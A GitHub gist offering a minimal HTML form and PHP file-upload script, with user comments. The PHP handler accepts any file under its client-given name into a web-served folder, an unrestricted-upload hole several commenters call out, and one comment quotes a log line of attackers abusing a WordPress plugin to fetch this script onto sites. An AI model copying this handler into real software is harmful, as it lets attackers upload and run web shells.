-
-
Save taterbase/2688850 to your computer and use it in GitHub Desktop.
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Upload your files</title> | |
</head> | |
<body> | |
<form enctype="multipart/form-data" action="upload.php" method="POST"> | |
<p>Upload your file</p> | |
<input type="file" name="uploaded_file"></input><br /> | |
<input type="submit" value="Upload"></input> | |
</form> | |
</body> | |
</html> | |
<?PHP | |
if(!empty($_FILES['uploaded_file'])) | |
{ | |
$path = "uploads/"; | |
$path = $path . basename( $_FILES['uploaded_file']['name']); | |
if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) { | |
echo "The file ". basename( $_FILES['uploaded_file']['name']). | |
" has been uploaded"; | |
} else{ | |
echo "There was an error uploading the file, please try again!"; | |
} | |
} | |
?> |
Please use action="PATH_TO_YOUR_UPLOAD_DIRECTORY/"; instead of action="upload.php" for this gist!
It is because there are someone using your gist to upload hazardous scripts at wordpress sites.
really helpfull and easy to understand.
thank you
@BAHC: it's not the code problem. resize.php should sanitize the input instead of loading whatever being injected into get parameter.
hmm i wonder why if i upload a file larger than 1 mb the error came out -.-
I have the very same problem. Cannot upload files larger than 2MB. All file types are supported, but not all sizes. I don't think this has to do anything with the server, because I'm using PHP gallery, which uploads files up to 5MB.
Anyone?
Awesome tutorial ...it's help me a lot...
Visit www.cseworldonline.com
Thanks for this man.
Its legit!
DID YOU REALLY CLOSED <input TAG WITH < /input> ??
ROFL
good work
I am getting this error
Warning: move_uploaded_file(images/WIN_20180406_20_47_39_Pro.jpg): failed to open stream: Permission denied in /home/vhosts/www.eightballpool.ml/index.php on line 4
Warning: move_uploaded_file(): Unable to move '/tmp/phpKsH2uQ' to 'images/WIN_20180406_20_47_39_Pro.jpg' in /home/vhosts/www.eightballpool.ml/index.php on line 4
Just give write permission to the folder.
straight from w3school -_- and it isn't even protected against ufu exploit...
¡INCREÍBLE! ¡GRACIAS!
upd:
curl -F "uploaded_file=@my_file.txt" http: //server/upload.php
😁😁😁😁
i do not know where files go after uploading them
Thank you very much. Good tutorial.
make a "uploads" directory in the same place as you php file
mkdir uploads
change directory permissions
chmod 0777 /var/www/html/uploads
also make sure file_uploads = On is set in php.ini
setting upload_max_filesize = 10M and
post_max_size = 10M in php.ini should allow up to 10MB
but you also need to set client_max_body_size 10M; in nginx config or LimitRequestBody 10485760 in Apache
I'm still not having any success with uploading anything over 2mb
I'm using it for a wget server
Thanks for this script.It really helped to solve bigger issue i was having in understanding a php upload code
try kleeja php file upload script
https://kleeja.org
Excelente ejemplo.. Gracias por publicar..
@taterbase
good work . thanks for the script
it dosent work
Awesome script, works great as long as you create an upload folder in the same destination as the upload.php
thanks a lot bro :D
This sucks anyone would be able to upload a .php file and take control of your server, do NOT use it!
This is a terrible example of handling file uploads.
It does not check for file upload errors (via the 'errors' element under $_FILES).
The 'name' is specified by the client and should not be trusted. It may also contain characters that are not valid for filenames on the servers filesystem.
There's no handling of duplicate filenames - one file upload could overwrite a previous file upload.
This code does not check the content of the uploaded file. You may be expecting an image to be uploaded, but the client may upload a PHP script instead - if that file is uploaded to a web accessible directory, the client could then execute that PHP script. This would lead to further compromises of your server and/or your hosting being used for malicious purposes (phishing, illegal content).
You should always check the content of uploaded files using the fileinfo extension, mime_content_type(), or a function specific to the expected content type (eg. the type returned by getimagesize() for images)
Thank you very much, this one finally works!
For the ones complaining, the point of this script is that beginners can understand the base code for uploading files, and can add validation afterwards.
Thank you,
Late to the party, but THANK YOU for putting a dead simple minimalist version of an upload. The only other guides I saw had all this extra crap that caused errors, required multiple files, etc.
This file just works. You might need to change your download folder, but it's simple and solid.
Steps to Reproduce
For windows
- Run apache server or using Xampp run apache.
- Create an upload folder in
C:\xampp\htdocs
- Also put this upload.php on the same folder
C:\xampp\htdocs
For *Nix
- Create an upload folder in
/var/www/html/
- Put the upload.php file in the same folder
/var/www/html/
- Run Apache service.
If someone needs similar (i.e. very simple) but a way more advanced and useful solution, please be my guest: https://github.com/sensboston/uploader
Your "simple" gist someone is using in real suspicious way:
91.214.44.136 - - [27/Aug/2018:08:22:16 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=https://gist.githubusercontent.com/taterbase/2688850/raw/b9d214c9cbcf624e13c825d4de663e77bf38cc14/upload.php HTTP/1.1" 302 593 "-" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0"